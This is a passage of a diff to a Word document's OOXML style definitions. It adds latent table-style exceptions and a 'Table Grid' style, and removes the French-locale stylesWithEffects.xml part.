+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -548,206 +1160,25 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
-</w:styles>
-</file>
-
-<file path=word/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
-  <w:docDefaults>
-    <w:rPrDefault>
-      <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-        <w:sz w:val="22"/>
-        <w:szCs w:val="22"/>
-        <w:lang w:val="fr-FR" w:eastAsia="en-US" w:bidi="ar-SA"/>
-      </w:rPr>
-    </w:rPrDefault>
-    <w:pPrDefault>
-      <w:pPr>
-        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-    </w:pPrDefault>
-  </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
-  </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
-    <w:name w:val="Normal"/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
-    <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
+  <w:style w:type="table" w:styleId="Grilledutableau">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableauNormal"/>
+    <w:uiPriority w:val="59"/>
     <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A352B3"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
     <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
     </w:tblPr>
-  </w:style>
